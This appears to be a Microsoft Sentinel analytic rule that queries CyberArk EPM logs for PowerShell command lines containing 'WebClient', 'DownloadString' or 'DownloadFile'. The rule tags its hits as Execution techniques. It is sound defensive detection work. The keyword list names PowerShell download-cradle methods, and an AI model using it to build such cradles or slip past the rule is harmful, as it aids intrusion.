id: 576cac40-d6f5-4ef9-9c3d-013b94656bea name: CyberArkEPM - Powershell downloads description: | 'Query shows powershell downloads.' severity: Medium requiredDataConnectors: - connectorId: CyberArkEPM dataTypes: - CyberArkEPM tactics: - Execution relevantTechniques: - T1204 - T1059 query: | CyberArkEPM | where TimeGenerated > ago(24h) | where ActingProcessFileInternalName =~ 'powershell.exe' | where ActingProcessCommandLine has_any ('WebClient', 'DownloadString', 'DownloadFile') | extend AccountCustomEntity = ActorUsername entityMappings: - entityType: Account fieldMappings: - identifier: Name columnName: AccountCustomEntity